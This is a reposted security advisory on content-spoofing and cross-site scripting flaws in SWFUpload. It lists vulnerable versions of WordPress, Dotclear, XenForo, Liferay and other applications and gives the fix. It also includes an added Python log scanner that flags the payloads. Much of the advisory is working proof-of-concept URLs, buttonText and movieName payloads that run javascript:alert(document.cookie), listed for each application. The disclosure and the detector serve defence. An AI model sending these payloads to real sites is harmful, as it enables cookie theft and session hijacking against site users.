Vulnerabilities in SWFUpload in multiple web applications: WordPress, Dotclear, InstantCMS, AionWeb
Source: Internet  Published: php入门很简单 pdf  Editor: 程序博客网  Time: 2024/05/02 00:08
Hello list!
Earlier I wrote about Content Spoofing and Cross-Site Scripting
vulnerabilities in SWFUpload (http://securityvulns.ru/docs29181.html). This
is a very popular Flash file, which is used on tens of millions of web sites
and in hundreds of web applications (WordPress alone is used on more than 62
million web sites according to wordpress.com).
Last year I wrote about another XSS hole in SWFUpload and I mentioned that
there are many web applications with vulnerable SWFUpload. All of them are
vulnerable to these new vulnerabilities, except the swfupload.swf bundled
with WordPress since version 3.3.2.
SWFUpload's files go by different names: swfupload.swf, swfupload_f9.swf,
swfupload_f8.swf, swfupload_f10.swf and swfupload_f11.swf. Many web
applications include several of these swf-files. Not all of them are
vulnerable to the new holes: swfupload_f8.swf and swfupload_f9.swf are not
vulnerable (they have no buttonText functionality according to my
research).
So among those web applications, the following are vulnerable (plus many
other web applications):
swfupload.swf - Dotclear, XenForo, InstantCMS, AionWeb, Dolphin,
SwfUploadPanel for TYPO3 CMS, SentinelleOnAir.
swfupload_f10.swf - SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE,
Liferay Portal (Community Edition and Enterprise Edition), Swfupload for
Drupal, SWFUpload for Codeigniter, SentinelleOnAir.
swfupload_f11.swf - SentinelleOnAir.
InfoGlue is also vulnerable (I wrote last month about an XSS vulnerability
in its ZeroClipboard.swf), because it has SWFUpload too.
-------------------------
Affected products:
-------------------------
All web applications with SWFUpload (v2.2.0.1 and previous versions) are
vulnerable.
WordPress 2.7 - 3.3.1 (which bundle swfupload.swf) are vulnerable. The fixed
swfupload.swf in WP 3.3.2 contains a fix both for the previous XSS and for
these CS and XSS vulnerabilities (even though the WP developers didn't write
about it).
Potentially all versions of Dotclear, InstantCMS, AionWeb, Dolphin,
SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal
(Community Edition, earlier called Standard Edition, and Enterprise
Edition), Swfupload for Drupal, SWFUpload for Codeigniter and SentinelleOnAir
are vulnerable. There is no information that they have fixed these
vulnerabilities in their software (whereas these holes were fixed together
with another XSS hole in WordPress 3.3.2 on 20.04.2012).
XenForo 1.0.0 - 1.1.2 are vulnerable. In XenForo 1.1.3 this vulnerability
was fixed and a patch was released for previous versions. They used the same
swf-file as WP 3.3.2, so it contains a fix both for the previous XSS and for
these CS and XSS vulnerabilities (even though the XenForo developers didn't
write about it, because they didn't know, since the WP developers fixed it
silently).
-----
Fix:
-----
Use swfupload.swf from WordPress 3.3.2 or a later version. All web
developers need to update their vulnerable version of SWFUpload to this
fixed version.
----------
Details:
----------
There are two vulnerabilities in SWFUpload.
Content Spoofing (WASC-12):
http://site/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
It's possible to inject text, images and HTML (e.g. for link injection).
Cross-Site Scripting (WASC-08):
http://site/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
The code executes after a click, so it's strictly social XSS (the victim
has to click the injected link).
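Since both payloads travel in the buttonText (and, for the older hole, movieName) query parameter of a request for an SWFUpload movie, a site operator can check access logs for them. The following detector is an added example, not code from the advisory or from SWFUpload; the log lines it scans are constructed, with paths taken from the advisory:

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# SWFUpload movie file names listed in the advisory: swfupload.swf,
# swfupload_f8/f9/f10/f11.swf and the swfupload10.swf / swfupload11.swf variants.
SWF_PATH_RE = re.compile(r"/swfupload(?:_?f?\d+)?\.swf$", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/')
# Markup or a script URL in buttonText is what both the CS and XSS payloads need.
MARKUP_RE = re.compile(r"<|javascript\s*:", re.IGNORECASE)
# A legitimate movieName is an identifier; quotes or brackets are the older XSS.
SAFE_MOVIENAME_RE = re.compile(r"^[A-Za-z0-9_]*$")


def classify_request(target):
    """Return 'buttonText' or 'movieName' when the request is for an SWFUpload
    movie and carries a suspicious value in that parameter, else None."""
    parts = urlsplit(target)
    if not SWF_PATH_RE.search(parts.path):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("buttonText", []):
        # parse_qs decoded once; decode twice more in case of double encoding
        if MARKUP_RE.search(unquote(unquote(value))):
            return "buttonText"
    for value in params.get("movieName", []):
        if not SAFE_MOVIENAME_RE.match(unquote(value)):
            return "movieName"
    return None


def scan_log(lines):
    """Yield (line_number, parameter) for each suspicious SWFUpload request."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            parameter = classify_request(match.group(1))
            if parameter:
                yield number, parameter


# Constructed Apache combined-log lines (not real traffic); paths are the advisory's.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Apr/2012:10:00:01 +0000] "GET /wp-includes/js/swfupload/swfupload.swf?movieName=SWFUpload_0 HTTP/1.1" 200 12345',
    '203.0.113.6 - - [20/Apr/2012:10:00:02 +0000] "GET /wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E HTTP/1.1" 200 12345',
    '203.0.113.7 - - [20/Apr/2012:10:00:03 +0000] "GET /html/js/misc/swfupload/swfupload_f10.swf?buttonText=Upload%20files HTTP/1.1" 200 12345',
    '203.0.113.8 - - [20/Apr/2012:10:00:04 +0000] "GET /webapp/applications/swfupload/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// HTTP/1.1" 200 12345',
]

if __name__ == "__main__":
    for number, parameter in scan_log(SAMPLE_LOG):
        print(f"line {number}: suspicious {parameter} value sent to an SWFUpload movie")
```

A hit only shows that someone requested the movie with a crafted parameter; whether the XSS fired depends on the victim clicking, so treat hits as a prompt to replace the swf-file, not as proof of compromise.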
Here are examples of the XSS vulnerability in different web applications:
WordPress:
http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Dotclear:
http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
XenForo:
http://site/js/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
InstantCMS:
http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
AionWeb:
http://site/engine/classes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Dolphin:
http://site/plugins/swfupload/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
SwfUploadPanel for TYPO3 CMS:
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Archiv plugin for TinyMCE:
http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Liferay Portal:
http://site/html/js/misc/swfupload/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Swfupload for Drupal:
As can be seen from the project
http://code.google.com/p/drupal-swfupload/, there is a version of Swfupload
for Drupal. But this project itself contains no files. They are in the
project Respectiva (http://code.google.com/p/respectiva/), which is Drupal
with Swfupload.
http://site/js/libs/swfupload_f10.swf
SWFUpload for Codeigniter:
http://site/www/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
SentinelleOnAir:
http://site/upload/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/upload/swfupload/swfupload10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/upload/swfupload/swfupload11.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
InfoGlue:
Previous XSS vulnerabilities:
http://site/webapp/applications/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/webapp/applications/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/webapp/applications/swfupload/swfupload_f9.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
New XSS vulnerability:
http://site/webapp/applications/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua